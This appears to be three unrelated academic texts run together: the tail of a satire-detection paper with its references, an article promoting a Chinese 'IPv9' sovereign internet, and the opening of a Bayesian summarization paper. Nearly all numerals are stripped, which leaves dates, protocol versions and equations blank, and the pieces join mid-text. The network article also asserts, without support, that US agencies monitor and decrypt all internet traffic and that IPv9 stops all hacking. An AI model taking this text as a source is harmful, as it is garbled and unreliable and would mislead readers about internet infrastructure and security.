words such as president, vice-president, obama, biden, bush, clinton. similarly, we associ- ated with the quote topic profanity a list of pro- fanity words. we associate types with quote cate- gories corresponding to style and topic, namely pro- fanity, drugs, politeness, science, legal, politics, controversy, and another set of seven types with entity types, namely president, liberal, conserva- tive, anonymous, politics, speaker, law enforce- ment. in the bottom left part of figure (in blue), we show the activation strength of each category with respect to the set of selected quote topics. intu- itively, we count the number of times the words as- sociated with a given topic appeared in the text span corresponding to a category assignment pair, sepa- rately for each output prediction. we normalize this value by the total number of topic word occurrences, over all category assignment pairs. note that we only look at the text span corresponding to quote vertices in the nrg. we provide a similar analysis for entity categories in the bottom right part of fig- ure (in green). we show the activation strength of each category with respect to the set of selected entity topic words. 
as can be expected, we can see that profanity words are only associated with satir- ical categories, and even more interestingly, when words appear in both satirical and real predictions, they tend to fall into different categories. for ex- ample, the topic words related to drugs can ap- pear both in real articles discussing alcohol and drug policies. but topic words related to drugs also ap- pear in satirical articles portraying politicians using these substances. while these are only qualitative results, we believe they provide strong intuitions for future work, especially considering the fact that the activation values do not rely on direct supervision, and only reflect the common-sense patterns emerg- ing from the learned model. summary and future work in this paper we presented a latent variable model for satire detection. we followed the observation that satire detection is inherently a semantic task and modeled the common-sense inferences required for it using a latent variable framework. we designed our experiments specifically to ex- amine if our model can generalize better than un- structured lexical models by testing it on out-of- domain data. our experiments show that in these challenging settings, the performance gap between our approach and the unstructured models increases, demonstrating the effectiveness of our approach. in this paper we restricted ourselves to limited narrative representation. in the future we intend to study how to extend this representation to capture more nuanced information. learning common-sense representation for pre- diction problems has considerable potential for nlp applications. as the nlp community considers in- creasingly challenging tasks focusing on semantic and pragmatic aspects, the importance of finding such common-sense representation will increase. in this paper we demonstrated the potential of common-sense representations for one application. we hope these results will serve as a starting point for other studies in this direction. references gabor angeli and christopher d manning. . nat- uralli: natural logic inference for common sense rea- soning. in proc. of the conference on empirical meth- ods for natural language processing (emnlp). jonathan berant, vivek srikumar, pei-chun chen, abby vander linden, brittany harding, brad huang, peter clark, and christopher d. manning. . model- ing biological processes for reading comprehension. in proc. of the conference on empirical methods for natural language processing (emnlp). antoine bordes, jason weston, ronan collobert, and yoshua bengio. . learning structured embed- dings of knowledge bases. in proc. of the national conference on artificial intelligence (aaai). clint burfoot and timothy baldwin. . automatic satire detection: are you having a laugh? in proc. of the annual meeting of the association computational linguistics (acl). nathanael chambers and dan jurafsky. . unsuper- vised learning of narrative event chains. in proc. of the annual meeting of the association computational linguistics (acl). nathanael chambers and dan jurafsky. . unsuper- vised learning of narrative schemas and their partici- pants. in proc. of the annual meeting of the associa- tion computational linguistics (acl). dmitry davidov, oren tsur, and ari rappoport. . semi-supervised recognition of sarcastic sentences in twitter and amazon. in proc. of the annual confer- ence on computational natural language learning (conll). david k elson. . dramabank: annotating agency in narrative discourse. in proc. 
of the international conference on language resources and evaluation (lrec). p. f. felzenszwalb, r. b. girshick, d. mcallester, and d. ramanan. . object detection with discrimina- tively trained part based models. ieee transactions on pattern analysis and machine intelligence, ( ). elena filatova. . irony and sarcasm: corpus gen- eration and analysis using crowdsourcing. in proc. of the international conference on language resources and evaluation (lrec). matt gerber, andrew s gordon, and kenji sagae. . open-domain commonsense reasoning using discourse relations from a corpus of weblog stories. in proc. of the naacl hlt first international workshop on formalisms and methodology for learn- ing by reading. roberto gonzález-ibánez, smaranda muresan, and nina wacholder. . identifying sarcasm in twitter: a closer look. in proc. of the annual meeting of the as- sociation computational linguistics (acl). associa- tion for computational linguistics. andrew s gordon, cosmin adrian bejan, and kenji sagae. . commonsense causal reasoning using millions of personal stories. in proc. of the national conference on artificial intelligence (aaai). andrew s gordon, zornitsa kozareva, and melissa roemmele. . semeval- task : choice of plausible alternatives: an evaluation of commonsense causal reasoning. in proc. of the sixth international workshop on semantic evaluation. amit goyal, ellen riloff, and hal daumé iii. . au- tomatically producing plot unit representations for nar- rative text. in proc. of the conference on empirical methods for natural language processing (emnlp). jerry r hobbs, mark stickel, paul martin, and douglas edwards. . interpretation as abduction. in proc. of the annual meeting of the association computa- tional linguistics (acl). jihen karoui, farah benamara, v?ronique moriceau, nathalie aussenac-gilles, and lamia hadrich bel- guith. . towards a contextual pragmatic model to detect irony in tweets. in proc. of the annual meeting of the association computational linguistics (acl). yoon kim. . convolutional neural networks for sentence classification. in proc. of the conference on empirical methods for natural language processing (emnlp). igor labutov and hod lipson. . humor as circuits in semantic networks. in proc. of the annual meeting of the association computational linguistics (acl). wendy g. lehnert. . plot units and narrative sum- marization. cognitive science, ( ): – . douglas b lenat. . cyc: a large-scale investment in knowledge infrastructure. communications of the acm, ( ): – . hugo liu and push singh. . conceptnet?a practi- cal commonsense reasoning tool-kit. bt technology journal, ( ): – . peter lobue and alexander yates. . types of common-sense knowledge needed for recognizing tex- tual entailment. in proc. of the annual meeting of the association computational linguistics (acl). stephanie lukin and marilyn walker. . really? well. apparently bootstrapping improves the perfor- mance of sarcasm and nastiness classifiers for online dialogue. in proc. of the workshop on language anal- ysis in social media. inderjeet mani. . computational modeling of nar- rative. synthesis lectures on human language tech- nologies. morgan & claypool publishers. christopher d. manning, mihai surdeanu, john bauer, jenny finkel, steven j. bethard, and david mcclosky. . the stanford corenlp natural language pro- cessing toolkit. in proc. of the annual meeting of the association computational linguistics (acl). andré ft martins, noah a smith, and eric p xing. . 
polyhedral outer approximations with applica- tion to natural language parsing. in proc. of the inter- national conference on machine learning (icml). j. mccarthy. . circumscription a form of non- monotonic reasoning. artificial intelligence, ( , ). tomas mikolov, ilya sutskever, kai chen, gregory s corrado, and jeffrey dean. . distributed rep- resentations of words and phrases and their composi- tionality. in the conference on advances in neural information processing systems (nips). tim o’keefe, silvia pareti, james r curran, irena ko- prinska, and matthew honnibal. . a sequence labelling approach to quote attribution. in proc. of the conference on empirical methods for natural lan- guage processing (emnlp). bo pang and lillian lee. . opinion mining and sentiment analysis. foundations and trends in infor- mation retrieval, ( - ): – . v. punyakanok, d. roth, and w. yih. . the impor- tance of syntactic parsing and inference in semantic role labeling. computational linguistics, ( ). nathan d. ratliff, j. andrew bagnell, and martin zinke- vich. . (approximate) subgradient methods for structured prediction. in proc. of the international conference on artificial intelligence and statistics (aistats). raymond reiter. . a logic for default reasoning. artificial intelligence, ( ): – . antonio reyes, paolo rosso, and tony veale. . a multidimensional approach for detecting irony in twit- ter. language resources and evaluation, ( ): – . matthew richardson, christopher j. c. burges, and erin renshaw. . mctest: a challenge dataset for the open-domain machine comprehension of text. in proc. of the conference on empirical methods for natural language processing (emnlp). ellen riloff, ashequl qadir, prafulla surve, lalindra de silva, nathan gilbert, and ruihong huang. . sarcasm as contrast between a positive sentiment and negative situation. in proc. of the conference on empirical methods for natural language processing (emnlp). richard socher, danqi chen, christopher d manning, and andrew ng. . reasoning with neural ten- sor networks for knowledge base completion. in the conference on advances in neural information pro- cessing systems (nips). xu sun, takuya matsuzaki, , daisuke okanohara, and junichi tsujii. . latent variable perceptron al- gorithm for structured classication. in proc. of the in- ternational joint conference on artificial intelligence (ijcai). niket tandon, gerard de melo, and gerhard weikum. . deriving a web-scale common sense fact database. in proc. of the national conference on arti- ficial intelligence (aaai). joseph tepperman, david r traum, and shrikanth narayanan. . ” yeah right”: sarcasm recognition for spoken dialogue systems. in proc. of interspeech. byron c. wallace, do kook choe, laura kertz, and eu- gene charniak. . humans require context to in- fer ironic intent (so computers probably do, too). in proc. of the annual meeting of the association com- putational linguistics (acl). byron c. wallace, do kook choe, and eugene charniak. . sparse, contextually informed models for irony detection: exploiting user communities, entities and sentiment. in proc. of the annual meeting of the asso- ciation computational linguistics (acl). hai wang and mohit bansal kevin gimpel david mcallester. . machine comprehension with syn- tax, frames, and semantics. in proc. of the annual meeting of the association computational linguistics (acl). international journal of advanced network, monitoring and controls volume , no. 
, from network security to network autonomous wang yubian* department of railway transportation control belarusian state university of transport , kirova street,gomel, republic of belarus *is the communication author. e-mail: alika_wang@mail.ru yuri shebzukhov department of the international relations belarusian state university of transport republic of belarus , kirovastreet, gomel, republic of belarus e-mail: oms@bsut.by abstract—in the th century, the emergence of the internet has completely changed the work and life of human beings around the world. today, people are increasingly inseparable from network. the internet has been integrated with the global industry, agriculture, education, science,technologyand national defense. the current internet was originated in the united states. the internet systems based on ipv and ipv ,they are controlled by the united states completely. computers connected to the internet are subject to data retention and backup in the united states. data security is greatly threatened. in addition, due to limitations and loopholes in the design of the internet, the internet is subject to many different types of attacks. internet research which based on security autonomy has received the attention of sovereign countries in the world. this paper mainly introduces the future internet system developed by chinese researchers based on the current research on internet servers,which is a new generation network system,the research and application of this system will have a profound impact on the world's internet. keywords-network security; root server; network autonomous; future internet people can’t live without the internet;internet has become a necessity in daily life.the share of the network economy has accounted for % of the global gdp. the importance of the network has become more and more prominent, so the basic work about the network is even more important. now the internet has two biggest problems. one is the cyber sovereignty, which is about the network’s belongs. it is obviously that the united stateshold the internet. how to adhere to cyber sovereignty is still a challenge. another problem is that many countries hope the operators will speed up and reduce the cost at the same time. it need the operators to reduce the bandwidth cost of access to the internet by smes, and how to reduce the bandwidth fee for accessing the internet is a problem. this two major problems are now more difficult to solve, and why? we need specific analysis of specific issues and tell everyone what solutions we have. i. cyberspace first of all, there must be a definition of cyberspace. this is very important. how do we adhere to the sovereignty of cyberspace?currently,there is noaccurate definition in the media, and we think it should be definedproperly. cyberspace is a virtual space that contains three basic elements.in the space,virtual and real are contained, and dominated by virtual. in this virtual cyberspace, it is not these infrastructures that are in the most important leadership position, nor our application environment, but the full root system. this must be clear, if this is not clear, many explanations will go wrong. the core embodiment of cyberspace sovereignty is the standard protocol for data communication technology. 
at present, it includes the ipv , ipv and future network/ipv network data communication standards and protocols of the existing equipment running in the world, and the formed network space address naming rights, distribution rights, resolution rights and route addressing operation management rights. the core resources of cyberspace include: the parent root server, the primary server, the root name servers, the ip address of the address and domain name resolution system, asset equipment and operation management rights. therefore, it can be said who owns the core assets of cyberspace, who masters the sovereignty of cyberspace. doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , ii. internet server the working principle of the current public network is not thoroughly understood. actually, this is very important. this determines how to adhere the cyberspace sovereignty. this is determined the basic principles. any time we access the network, including any computer on the internet, phone internet access and mobile internet access. firstly, we must access the root server. the root system consists of the parent root server and the primary root server (the publishing host). this hidden publishing host only root domain name servers ( root domain name servers are equal rights) that can be accessed to maintain this hidden publishing host. the root domain name servers read the primary root server, then read the parent root server and obtain the data, then read by the mirror server, and spread to the entire network. the root server is mainly used to manage the home directory of the internet. all parent, root, and sub- servers of ipv are managed by icann, an internet domain name and number assignment authority authorized by the us government are responsible for the management of global internet domain name root servers, domain name systems, and ip addresses. there are only root name servers in the world. ten of them are in the united states, two in europe, in the united kingdom and sweden, and one in asia in japan. these logical root servers direct web browsers such as firefox or internet explorer and email programs to control internet communications. because the root server has more than internet domain name suffixes (such as .edu, .com, etc.) approved by the us government and all national domain names (such as .us in the us, .cn in china, etc.). since the establishment of the internet, the world has become very dependent on the united states. the united states has controlled the entire internet by controlling the root server, posing a potentially major threat to cybersecurity in other countries. the so- called dependence, embodied in the working mechanism of the internet, lies in the problem of "root server". in theory, any form of standard domain name to be analyzed, in accordance with the technical process, must be completed through the work of the global "hierarchical" domain name resolution system. the first layer of the "hierarchical" domain name resolution system is the root server, which is responsible for managing domain name information of countries all over the world. below the root server is a top-level domain name server, that is, a database of relevant national domain name management institutions, such as cnnic in china, and then at the next level. the domain name database and the isp's cache server. a domain name must first be parsed by the root database before it can be redirected to the top- level domain name server. iii. 
internet access and security any network access in the world should firstvisit the united states, and now some people say that many visits are not going abroad, and indeed some businesses do not feel abroad for the time being. in fact, the mirror root serversare working and cache serversare working. the internet set up mirror servers in some countries without root servers, but these servers are completely controlled by the united states. commonly used urls can be parsed locally, and data can cache locally to prevent network congestion. however, the root of the internet can back up the entire network. traffic can still go out, although most of the data traffic business is domestic. this is why the united states monitors the world through the internet, and because of economic reasons, the data traffic to the root system is two-way billing. since the widespread use of the internet, the internet has been constantly challenged, and various types of attacks from all over the world have continued. typical server failures are as follows. a. failure in in july , a new general list of internet address assignments was automatically passed between these domain name servers, but this list is actually blank. this human error led to the most severe local service disruption on the internet, resulting in inaccessible web pages within a few days and the inability to send emails. b. attack in on october , , at : pm et, the servers were hit by the most serious and largest cyber-attack in history. the attack was a ddos attack (distributed denial of service). with the help of client/server technology, this attack combines multiple computers as attack platforms and launches attacks on one or more targets, thus doubling the power of denial of service attacks. data that is to times more than the conventional number rushed to these servers and caused of them to not function properly. seven units lost their ability to handle network communications, and the other two were immediately behind. this attack may not be affected by the average user. if you only analyze from the "consequences" of this incident, some people may think that "not all root name servers will be attacked, so you can rest assured", or international journal of advanced network, monitoring and controls volume , no. , "the root name server has no problem with the root name server", it is still too early. but they are not clear about the root cause. not all root name servers are affected; the attack ends in a short period of time; the attack is relatively simple, so it is easy to take appropriate measures. since there is no particularly effective solution for ddos attacks, imagine that if the attack time is extended, the attack is a bit more complicated, or there is one more server, the global internet will have quite a few web browsing and e-mail services. this will be completely interrupted. c. dns failure at the beginning of beginning around : on january , , there was a problem with dns resolution of a large number of internet domain names around the world. some well-known websites and all non-existent domain names were incorrectly pointed to . . . (fremont, california, united states, hurricane electric). china's dns domain name resolution system has experienced a wide range of access failures, which have been confirmed by several dns domain name resolution service providers, including dnspod. the accident affected the whole country. nearly two-thirds of the websites had access faults in different areas and network environments to varying degrees. 
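The resolution chain outlined in the preceding sections (a root zone that refers queries to a top-level-domain zone, which in turn refers them to the authoritative or national/ISP level) can be pictured with a small, entirely schematic lookup model. The zone contents, server names, and the returned address below are placeholders, not real root, TLD, or mirror data.

# A toy model of hierarchical DNS delegation: the root zone only knows where
# the TLD servers are, the TLD zone only knows where the authoritative
# servers are, and the answer comes from the final hop.
ROOT_ZONE = {"com.": "tld-server-for-com"}
TLD_ZONES = {"tld-server-for-com": {"example.com.": "auth-server-for-example"}}
AUTH_ZONES = {"auth-server-for-example": {"www.example.com.": "203.0.113.10"}}

def resolve(name: str) -> str:
    labels = name.rstrip(".").split(".")
    tld = labels[-1] + "."
    domain = ".".join(labels[-2:]) + "."
    # Step 1: ask a root server, which refers us to the TLD server.
    tld_server = ROOT_ZONE[tld]
    # Step 2: ask the TLD server, which refers us to the authoritative server.
    auth_server = TLD_ZONES[tld_server][domain]
    # Step 3: the authoritative server returns the address record.
    return AUTH_ZONES[auth_server][name]

print(resolve("www.example.com."))   # -> 203.0.113.10

The sketch also makes the dependence argument concrete: whoever controls the contents of ROOT_ZONE controls the first step of every lookup, and an error or outage at that level, as in the 1997 and 2002 incidents above, propagates to every name beneath it.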
the framework of the entire network information security can be divided into three levels.  information security of various services at the network application layer, killing viruses, anti- trojans, hardening firewalls and proactively defending against network attacks are the main tasks of network security departments in different countries. andmany information security is mainly supported by encryption technology. as long as they are targeted by capable hackers, it is only a matter of time before information encryption and decryption are made.  the network core equipment and terminal equipment, including the cpu core chip and the os operating system/database are all from the united states. the information of this equipment is transparent to the united states and the nsa, and there is no security possibility.  the problem of network information security caused by the lack of network sovereignty is a more global problem. each bit under each communication ip address is monitored by the us internet root system. all data is analyzed by the us national security bureau for big data analysis, and then stored and archived. the encrypted information is decrypted according to the specific situation! in order to change the situation, china’s cyberspace is in a serious strategic passive situation, in order to defend the network sovereignty and build a new generation of sovereign networks with domestically controllable security, some countries have carried out research and development of some network system structures. iv. the new generation of the internet in , ministry of information industry of china established the “decimal network standard working group”. in , ministry of information industry of chinadefined ipv as a new generation internet to distinguish ipv officially. in order to break through the future network basic theory and support the next generation internet experiment and build the future network test facilities, including: original network equipment system, resource monitoring management system, covering cloud computing services, internet of things applications, spatial information network simulation, network information security open network test systems such as high-performance integrated circuit verification and quantum communication networks. in december , the core parts of the future international standards published by iso/iec, such as "name and addressing" and "safety", are dominated by chinese experts and have core intellectual property rights. the future network has clear and unique definitions. major countries such as the united states, russia, canada, and south korea have voted in favor. on june , , ministry of information industry of china published the relevant industry standards for ipv implementation in the country: sj/t , sj/t , sj/t , sj/t . this marks the -years hard workingreceive rewards. the chinese government has adopted the mature ipv main root/mother root/ root name server system named from nz. the core backbone router and user router product series have begun to build autonomous, intellectual property rights, and computer communication networks that are independent of the us internet but are internet compatible. international journal of advanced network, monitoring and controls volume , no. , the main features of the future network/ipv are as following. a. increasing the geographical and national concepts get increase it is distributed and managed by countries, and it is close to the analysis, and the flow of information is reasonable. 
end-to-end communication can be realized according to requirements, and it is not necessary to be controlled by the united states like ipv and ipv . it is low-cost, high-efficiency, and it saves network expenses andachieves environmental protection. b. realizing the unification of electronic tag and barcodes the huge address capacity of ipv realizes the uniqueness of address allocation. the combination of ip address, digital domain name and electronic tag and bar code coding technology will extends the network to every corner of sensor technology. ipv enables bar codes to have the same internet access function as electronic tags, and can track and control the circulation of goods and equipment from the production plant. the bar code can also be identified when the rfid electronic tag wireless channel is disturbed. china's unique barcode and rfid electronic label hybrid technology will greatly reduce the management costs of the global manufacturing and logistics industries. c. realize multi-code integration ipv not only makes the domain name and ip address unified, but also can be combined with the global unique identifier of the person or thing, so that the phone number, mobile phone number, domain name and ip address can be combined into one number; the same code for electronic tags and barcodes is a solution and application platform for the future information society and the realization of “ubiquitous” networks. d. real-name internet access ipv network can realize real-name internet access, and can also protect customers' privacy rights. it can open up a certain number of anonymous addresses for blog use, but it does not allow anonymous address users to enter banks, government, social welfare, commodity circulation, etc. e. ipv has address encryption different from the current means of encrypting applications, ipv innovatively designed address encryption to extend security protection to the network layer, greatly improving the country's information security. whether it is ipv currently in use or the next-generation internet protocol ipv proposed by foreign countries is unmatched. the ipv communication protocol packet structure is designed reasonably, and the packet item function is clear. the ipv protocol is better than the ipv protocol in terms of address space, service quality, and security. when the application support and network device support are mature, the ipv protocol can replace the ipv protocol and become a communication protocol for network interconnection. the address representation of the data packets of the ipv protocol is different from that of the ipv or ipv protocol. therefore, the data packet header of the ipv protocol will not be recognized by the ipv or ipv system and will not be directly transmitted in these systems. therefore, using ipv protocol communication, its data messages will not be directly transmitted to other protocols' networks, thus controlling the data transmission range and improving the security of communication to a certain extent. f. currently, all hacker attacks and all online eavesdropping software are developed based on ipv ipv routers and v nics will not release these attack packets from hackers and hackers, and will build a great wall for hacking and online intelligence. v. summary the new generation internet based on ipv , the main root/mother root server system, the domain name resolution system, the backbone router/user router are all independently developed and produced by china, and are compatible with ipv /ipv . 
they support all existing applications of ipv , and the underlying network itself adds ipv /ipv . there is no security mechanism, the address itself can be encrypted, and the communication can be verified first. at the same time, the new generation network address is extremely rich, and it also includes information such as geographic location/industry category. in the future, the network/ipv starts with the address ^ power, and the number of addresses for managing digital assets can reach ^ power, future network. /ipv can not only meet the global -year communication address demand, but also an important tool for digital asset management. it is the core foundation for the future digital world/digital global and the future community of cyberspace destiny. international journal of advanced network, monitoring and controls volume , no. , references [ ] xie jianping etc.method of using whole digital code to assign address for computer [p]. us: , . . [ ] s. deering, r. hinden, network working group. internet protocol, version (ipv )-specification, rfc- , . . [ ] m. crawford. network working group. transmission of ipv packets over ethernet networks.rfc- , . . [ ] j. onions, network working group. a historical perspective on the usage of ip version . rfc . . . [ ] v. cerf, network working group. a view from the st century, rfc . . . [ ] information technology-future network- problem statement and requirement-part : naming and addressing, iso/iec dtr - , , . [ ] radio frequency identification tag information query service network architecture technical specification. sj/t - , . . transactions of the association for computational linguistics, ( ) – . action editor: noah smith. submitted / ; published / . c© association for computational linguistics. a novel feature-based bayesian model for query focused multi-document summarization jiwei li school of computer science carnegie mellon university bdlijiwei@gmail.com sujian li laboratory of computational linguistics peking university lisujian@pku.edu.cn abstract supervised learning methods and lda based topic model have been successfully applied in the field of multi-document summarization. in this paper, we propose a novel supervised approach that can in- corporate rich sentence features into bayesian topic models in a principled way, thus taking advantages of both topic model and feature based supervised learn- ing methods. experimental results on duc , tac and tac demonstrate the effective- ness of our approach. introduction query-focused multi-document summarization (nenkova et al., ; wan et al., ; ouyang et al., ) can facilitate users to grasp the main idea of documents. in query-focused summarization, a specific topic description, such as a query, which expresses the most important topic information is proposed before the document collection, and a summary would be generated according to the given topic. supervised models have been widely used in sum- marization (li, et al., , shen et al., , ouyang et al., ). supervised models usually re- gard summarization as a classification or regression problem and use various sentence features to build a classifier based on labeled negative or positive sam- ples. however, existing supervised approaches sel- dom exploit the intrinsic structure among sentences. this disadvantage usually gives rise to serious prob- lems such as unbalance and low recall in summaries. 
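the classification view of supervised summarization sketched above can be made concrete with a toy example: each sentence is reduced to a small feature vector and a classifier is trained on sentences labeled as summary-worthy or not. the feature values, labels and the choice of logistic regression below are illustrative assumptions only, not the model proposed in this paper.

# a toy illustration of feature-based supervised sentence selection.
# the feature matrix and labels are invented for illustration.
import numpy as np
from sklearn.linear_model import LogisticRegression

# columns: [position in document, normalised length, cosine similarity to the query]
X_train = np.array([
    [0.0, 0.8, 0.9],    # first sentence, long, close to the query  -> positive sample
    [0.9, 0.2, 0.1],    # late, short, unrelated                    -> negative sample
    [0.1, 0.6, 0.7],
    [0.7, 0.3, 0.2],
])
y_train = np.array([1, 0, 1, 0])          # 1 = selected by the human annotator

clf = LogisticRegression().fit(X_train, y_train)

# score unseen candidate sentences and rank them for extraction
X_new = np.array([[0.05, 0.7, 0.8], [0.8, 0.4, 0.3]])
scores = clf.predict_proba(X_new)[:, 1]
print(scores, np.argsort(-scores))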
recently, lda-based (blei et al., ) bayesian topic models have widely been applied in multi- document summarization in that bayesian ap- proaches can offer clear and rigorous probabilis- tic interpretations for summaries(daume and marcu, ; haghighi and vanderwende, ; jin et al., ; mason and charniak, ; delort and alfon- seca, ). exiting bayesian approaches label sen- tences or words with topics and sentences which are closely related with query or can highly generalize documents are selected into summaries. however, lda topic model suffers from the intrinsic disad- vantages that it only uses word frequency for topic modeling and can not use useful text features such as position, word order etc (zhu and xing, ). for example, the first sentence in a document may be more important for summary since it is more likely to give a global generalization about the document. it is hard for lda model to consider such informa- tion, making useful information lost. it naturally comes to our minds that we can im- prove summarization performance by making full use of both useful text features and the latent seman- tic structures from by lda topic model. one related work is from celikyilmaz and hakkani-tur ( ). they built a hierarchical topic model called hybh- sum based on lda for topic discovery and assumed this model can produce appropriate scores for sen- tence evaluation. then the scores are used for tun- ing the weights of various features that helpful for summary generation. their work made a good step of combining topic model with feature based super- vised learning. however, what their approach con- fuses us is that whether a topic model only based on word frequency is good enough to generate an appropriate sentence score for regression. actually, how to incorporate features into lda topic model has been a open problem. supervised topic models such as slda(blei and macauliffe ) give us some inspiration. in slda, each document is asso- ciated with a labeled feature and slda can integrate such feature into lda for topic modeling in a prin- cipled way. with reference to the work of supervised lda models, in this paper, we propose a novel sentence feature based bayesian model s-slda for multi- document summarization. our approach can natu- rally combine feature based supervised methods and topic models. the most important and challeng- ing problem in our model is the tuning of feature weights. to solve this problem, we transform the problem of finding optimum feature weights into an optimization algorithm and learn these weights in a supervised way. a set of experiments are con- ducted based on the benchmark data of duc , tac and tac , and experimental results show the effectiveness of our model. the rest of the paper is organized as follows. sec- tion describes some background and related works. section describes our details of s-slda model. section demonstrates details of our approaches, including learning, inference and summary gener- ation. section provides experiments results and section concludes the paper. related work a variety of approaches have been proposed for query-focused multi-document summarizations such as unsupervised (semi-supervised) approaches, supervised approaches, and bayesian approaches. unsupervised (semi-supervised) approaches such as lexrank (erkan and radex, ), manifold (wan et al., ) treat summarization as a graph- based ranking problem. 
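as a rough sketch of the graph-based ranking idea used by lexrank and manifold, the snippet below builds a sentence-similarity graph and runs a pagerank-style power iteration to obtain sentence salience scores. the similarity matrix and damping factor are invented toy values, and the query-sensitive propagation used by manifold is omitted for brevity.

# pagerank-style sentence ranking over a toy sentence-similarity graph
import numpy as np

sim = np.array([                 # symmetric sentence-sentence similarity (toy values)
    [1.0, 0.6, 0.1, 0.0],
    [0.6, 1.0, 0.2, 0.1],
    [0.1, 0.2, 1.0, 0.7],
    [0.0, 0.1, 0.7, 1.0],
])
np.fill_diagonal(sim, 0.0)                   # ignore self-similarity
P = sim / sim.sum(axis=1, keepdims=True)     # row-stochastic transition matrix

d = 0.85                                     # damping factor, as in pagerank
n = P.shape[0]
r = np.full(n, 1.0 / n)
for _ in range(100):                         # power iteration until approximate convergence
    r = (1 - d) / n + d * (P.T @ r)
print(r)                                     # higher value = more salient sentence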
the relatedness between the query and each sentence is achieved by impos- ing querys influence on each sentence along with the propagation of graph. most supervised ap- proaches regard summarization task as a sentence level two class classification problem. supervised machine learning methods such as support vector machine(svm) (li, et al., ), maximum en- tropy (osborne, ) , conditional random field (shen et al., ) and regression models (ouyang et al., ) have been adopted to leverage the rich sentence features for summarization. recently, bayesian topic models have shown their power in summarization for its clear probabilistic interpretation. daume and marcu ( ) proposed bayesum model for sentence extraction based on query expansion concept in information retrieval. haghighi and vanderwende ( ) proposed topic- sum and hiersum which use a lda-like topic model and assign each sentence a distribution over back- ground topic, doc-specific topic and content topics. celikyilmaz and hakkani-tur ( ) made a good step in combining topic model with supervised fea- ture based regression for sentence scoring in sum- marization. in their model, the score of training sentences are firstly got through a novel hierarchi- cal topic model. then a featured based support vec- tor regression (svr) is used for sentence score pre- diction. the problem of celikyilmaz and hakkani- turs model is that topic model and feature based re- gression are two separate processes and the score of training sentences may be biased because their topic model only consider word frequency and fail to con- sider other important features. supervised feature based topic models have been proposed in recent years to incorporate different kinds of features into lda model. blei ( ) proposed slda for doc- ument response pairs and daniel et al. ( ) pro- posed labeled lda by defining a one to one corre- spondence between latent topic and user tags. zhu and xing ( ) proposed conditional topic random field (ctrf) which addresses feature and indepen- dent limitation in lda. model description . lda and slda the hierarchical bayesian lda (blei et al., ) models the probability of a corpus on hidden topics as shown in figure (a). let k be the number of topics , m be the number of documents in the cor- pus and v be vocabulary size. the topic distribution of each document θm is drawn from a prior dirichlet distribution dir(α), and each document word wmn is sampled from a topic-word distribution φz spec- ified by a drawn from the topic-document distribu- tion θm. β is a k×m dimensional matrix and each βk is a distribution over the v terms. the generat- ing procedure of lda is illustrated in figure . θm is a mixture proportion over topics of document m and zmn is a k dimensional variable that presents the topic assignment distribution of different words. supervised lda (slda) (blei and mcauliffe ) is a document feature based model and intro- figure : graphical models for (a) lda model and (b) slda model. . draw a document proportion vector θm|α ∼ dir(α) . for each word in m (a)draw topic assignment zmn|θ ∼ multi(θzmn ) (b)draw word wmn|zmn,β ∼ multi(βzmn ) figure : generation process for lda duces a response variable to each document for topic discovering, as shown in figure (b). in the gener- ative procedure of slda, the document pairwise la- bel is draw from y|−→zm,η,δ ∼ p(y|−→zm,η,δ ), where−→zm = n ∑n n= zm,n. . problem formulation here we firstly give a standard formulation of the task. 
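before the formal problem formulation, the plain lda generative story summarized in the figure above can be written as a short simulation. the corpus sizes, hyperparameters and random seed below are arbitrary toy choices made only for this sketch; the point is the order of the draws (θ_m from a dirichlet prior, then a topic and a word for every token).

# a small simulation of the lda generative process described above
import numpy as np

rng = np.random.default_rng(0)
K, V, M, N = 3, 10, 2, 8           # topics, vocabulary size, documents, words per document
alpha = np.full(K, 0.5)            # dirichlet prior over topics (toy value)
beta = rng.dirichlet(np.full(V, 0.1), size=K)    # K topic-word distributions

corpus = []
for m in range(M):
    theta_m = rng.dirichlet(alpha)               # document-topic proportions
    doc = []
    for _ in range(N):
        z = rng.choice(K, p=theta_m)             # topic assignment for this word
        w = rng.choice(V, p=beta[z])             # word drawn from that topic's distribution
        doc.append((z, w))
    corpus.append(doc)
print(corpus[0])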
let k be the number of topics, v be the vocabulary size and m be the number of documents. each document d_m is represented as a collection of sentences d_m = {s_s}, s = 1, ..., n_m, where n_m denotes the number of sentences in the m-th document. each sentence is represented as a collection of words {w_msn}, n = 1, ..., n_ms, where n_ms denotes the number of words in the current sentence. y_ms denotes the feature vector of the current sentence, and we assume that these features are independent.

s-slda. z_ms is the hidden variable indicating the topic of the current sentence. in s-slda, we make the assumption, proposed by gruber ( ), that all words in the same sentence are generated from the same topic. z_msn denotes the topic assignment of the current word; according to our assumption, z_msn = z_ms for any n ∈ [1, n_ms].

figure : graph model for the s-slda model.
figure : generation process for s-slda — 1. draw a document proportion vector θ_m | α ~ dir(α); 2. for each sentence in m: (a) draw the topic assignment z_ms | θ ~ mult(θ_m); (b) draw the feature vector y_ms | z_ms, η ~ p(y_ms | z_ms, η); (c) for each word w_msn in the current sentence, draw w_msn | z_ms, β ~ mult(β_{z_ms}).

the generative approach of s-slda is shown in figure and figure . we can see that the generative process involves not only the words within the current sentence, but also a series of sentence features. the mixture weights over features in s-slda are defined with a generalized linear model (glm):

p(y_ms | z_ms, η) = exp(z_ms^T η y_ms) / Σ_{z_ms} exp(z_ms^T η y_ms)   ( )

here we assume that each sentence has t features, so y_ms is a t × 1 dimensional vector. η is a k × t weight matrix of each feature upon the topics, which largely controls the feature generation procedure. unlike slda, where η is a latent variable estimated by a maximum likelihood estimation algorithm, in s-slda the value of η is trained through a supervised algorithm, which will be illustrated in detail in section .

posterior inference and estimation. given a document and labels for each sentence, the posterior distribution of the latent variables is:

p(θ, z_{1:n} | w_{1:n}, y, α, β_{1:k}, η) = [ ∏_m p(θ_m | α) ∏_s p(z_ms | θ_m) p(y_ms | z_ms, η) ∏_n p(w_msn | z_msn, β_{z_msn}) ] / [ ∫ dθ p(θ_m | α) Σ_z ∏_s p(z_ms | θ_m) p(y_ms | z_ms, η) ∏_n p(w_msn | β_{z_msn}) ]   ( )

eqn. ( ) cannot be computed efficiently. by applying jensen's inequality, we obtain a lower bound l on the log likelihood of the document, where

l = Σ_{ms} e[log p(z_ms | θ)] + Σ_{ms} e[log p(y_ms | z_ms, η)] + Σ_m e[log p(θ | α)] + Σ_{msn} e[log p(w_msn | z_ms, β)] + h(q)   ( )

where h(q) = −e[log q] is the entropy of the variational distribution q, which is defined as

